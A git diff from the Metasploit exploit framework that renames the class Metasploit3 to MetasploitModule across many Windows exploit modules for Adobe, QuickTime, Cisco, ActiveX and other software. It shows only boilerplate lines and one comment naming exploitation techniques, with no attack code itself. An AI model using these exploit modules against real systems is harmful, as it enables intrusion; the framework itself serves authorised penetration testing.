Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index 770d7c8fa9..4d157fe3e2 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index 2f18a7668a..39112c8f94 100644 --- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb index 2194a15c1e..20550092a5 100644 --- a/modules/exploits/windows/browser/adobe_flash_avm2.rb +++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb index 57bc88f9aa..fc286ce6bd 100644 --- a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb +++ b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb index 34dcd36cb9..0b3e808fbc 100644 --- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb +++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb index 5b1fdf05f8..f6d45a1423 100644 --- a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb index ac3e425873..7d18fb3de6 100644 --- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 692e2be2fa..3e0b780952 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index e1f1d0072b..4f831045aa 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_pcre.rb b/modules/exploits/windows/browser/adobe_flash_pcre.rb index f000571844..9de4c02cc0 100644 --- a/modules/exploits/windows/browser/adobe_flash_pcre.rb +++ b/modules/exploits/windows/browser/adobe_flash_pcre.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000' diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb index 7cd4e5d44e..3d5fea3c40 100644 --- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb +++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index 89e33338e5..84bc9cf971 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index 8acbbb573a..b2d3ce686c 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb index b4fa07267a..9111d09548 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb index 5575afab8c..169eb46fca 100644 --- a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb index b1af657d89..3c0a8c62b0 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb index 2fd3934e19..b20663ea80 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index 3a7dcbd1c1..cab570badc 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index d512e180d4..325a1669b1 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb index bfcdff41d3..c806c3cb97 100644 --- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb index cf67c75243..b0c0e7dffc 100644 --- a/modules/exploits/windows/browser/adobe_geticon.rb +++ b/modules/exploits/windows/browser/adobe_geticon.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 92bece600b..8b26e8b882 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index ab1bbc2970..61ffba6cb5 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index 6d3843fb63..d27e4c3fdd 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb index 388c30fe6b..a417a07bf4 100644 --- a/modules/exploits/windows/browser/adobe_toolbutton.rb +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index 392d49790e..03a8c41b0d 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb index 1598534a4b..6e83a0298d 100644 --- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb +++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index cd7abc4965..e92dbac293 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb index 8ed7b765ad..ab8329aab8 100644 --- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb index 0ed7599111..61d9d87c34 100644 --- a/modules/exploits/windows/browser/amaya_bdo.rb +++ b/modules/exploits/windows/browser/amaya_bdo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb index 618ceede6d..41de2bcd83 100644 --- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb +++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb index 6426521138..73c8fbc8df 100644 --- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb +++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb index 38e8c16c39..d34d0986cc 100644 --- a/modules/exploits/windows/browser/apple_itunes_playlist.rb +++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 8907f6869c..7432c5f21f 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb index 69d6b8a164..da040e12fd 100644 --- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb +++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb index fd94da6b32..c7f952df5b 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index 0a2cdaa1ed..14d8274cce 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index 2355aab342..0e8c2c5918 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # needs more testing/targets to be Great include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb index 6d58e6d12d..ec9ff0db78 100644 --- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb +++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index f73ec53adf..fa0467d743 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb index 1bd56b231c..19c103ab84 100644 --- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb +++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 695e939113..6f09ebd1d5 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index 523b471db6..2084de912a 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index a8e80a26fa..29a01fdafe 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # heap spray and address shifty include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 770403a7c7..e983150018 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -23,7 +23,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb index d0be485f04..c268856ee4 100644 --- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb +++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index 271caa3851..bb736f1946 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index bf6181bd25..e5fb4cc725 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 3a63699a2f..f883eb72e4 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb index b4ffe3edf2..9936fc912d 100644 --- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb +++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index 62d06f8211..757ba12da7 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index 3a39839a25..8fe38efe5c 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb index b5f802fa7f..55b5c6df4c 100644 --- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb +++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb index 78466bd120..5b35ecdef3 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb index 814fc873d2..199c27944b 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index 663b4945a0..58182c0a10 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb index e9a1aced93..affe99692b 100644 --- a/modules/exploits/windows/browser/clear_quest_cqole.rb +++ b/modules/exploits/windows/browser/clear_quest_cqole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index 3efacb9c49..d8f0fde955 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 37adc9b873..f67dc5fa41 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb 